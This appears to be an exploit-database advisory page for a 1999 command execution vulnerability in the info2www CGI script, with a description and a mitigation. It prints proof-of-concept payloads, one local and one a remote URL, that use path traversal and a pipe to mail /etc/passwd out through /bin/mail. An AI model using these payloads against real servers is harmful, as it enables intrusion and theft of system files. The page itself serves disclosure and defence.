info2www Script Command Execution Vulnerability

vendor:

info2www

by:

SecurityFocus

7.5

CVSS

HIGH

Command Execution

CWE

Product Name: info2www

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

1999

info2www Script Command Execution Vulnerability

The info2www script allows HTTP access to information stored in GNU EMACS Info Nodes. This script fails to properly parse input and can be used to execute commands on the server with permissions of the web server, by passing commands as part of a variable. Potential consequences of a successful exploitation involve anything the web server process has permissions to do, including possibly web site defacement.

Mitigation:

Ensure that the info2www script is not accessible from the web server.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1995/info

The info2www script allows HTTP access to information stored in GNU EMACS Info Nodes. This script fails to properly parse input and can be used to execute commands on the server with permissions of the web server, by passing commands as part of a variable. Potential consequences of a successful exploitation involve anything the web server process has permissions to do, including possibly web site defacement. 

Locally:
$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail recipient </etc/passwd|)'
$
You have new mail.
$

Remotely:
http://targethost/cgi-bin/info2www?(../../../../../../../../bin/mail recipient </etc/passwd|)